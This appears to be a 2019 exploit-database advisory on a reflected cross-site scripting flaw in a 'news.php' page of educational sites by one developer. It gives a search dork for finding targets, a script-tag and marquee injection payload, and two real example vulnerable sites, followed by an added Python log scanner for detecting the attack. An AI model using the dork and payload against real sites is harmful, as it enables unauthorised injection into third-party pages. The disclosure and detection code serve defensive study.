Educational Websites Developper - Chris Deotte - Cross Site Scripting (XSS)

2019.01.09
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Exploit title : Educational Websites Developper - Chris Deotte - Cross Site Scripting (XSS)
Exploit author : Salvatrucha
dork : intext: Website developed by Chris Deotte
Tested on : Win7_64

GET /news/news.php?p= HTTP/1.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

1) the xss vulnerability classification :
>CWE: CWE-79
>CVSS Base score: 5.3 — CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Exploit :
>http://target/news/news.php?p=[%Inject_Here%]
>Use payload/Injection : 1'"()%26%25<acx><ScRiPt ></ScRiPt><marquee><h>to my M7 and others F you are my stars it's great honor being with you wish you the best</h></marquee>&q=

Web References :
>The Cross Site Scripting Faq
>OWASP Cross Site Scripting
>OWASP PHP Top 5

Examples of vulnerable sites:
>https://ccom.ucsd.edu
>https://archive.fo/ADOa7

References:

Salvatrucha
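
A defender-side check for the issue described above, added here as an example and not part of the original advisory: it scans web access logs for requests to /news/news.php whose p parameter carries HTML metacharacters after percent-decoding, including double-encoded input. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines; the IP addresses are documentation placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Jan/2019:10:00:01 +0000] "GET /news/news.php?p=3 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [09/Jan/2019:10:00:05 +0000] "GET /news/news.php?p=1%27%22()%26%25'
    '%3Cacx%3E%3CScRiPt%20%3E%3C/ScRiPt%3E&q= HTTP/1.1" 200 5300',
    '198.51.100.9 - - [09/Jan/2019:10:00:09 +0000] "GET /news/news.php?p=%253Cmarquee%253Ehi'
    ' HTTP/1.1" 200 5290',
    '198.51.100.4 - - [09/Jan/2019:10:00:12 +0000] "GET /about.php?p=%3Cb%3E HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r'[<>"\']')  # characters that matter in an HTML output context


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded input is seen in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(lines, path="/news/news.php", param="p"):
    """Return (client_ip, decoded_value) for requests whose `param` contains markup."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != path:
            continue
        # parse_qsl splits on '&' before decoding, so an encoded %26 stays inside the value.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            clear = fully_decode(value)
            if name == param and MARKUP.search(clear):
                hits.append((line.split()[0], clear))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}  p={value!r}")
```

A hit only shows that markup reached the parameter; whether it was reflected unescaped depends on the page encoding its output for the HTML context.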



Copyright 2019, cxsecurity.com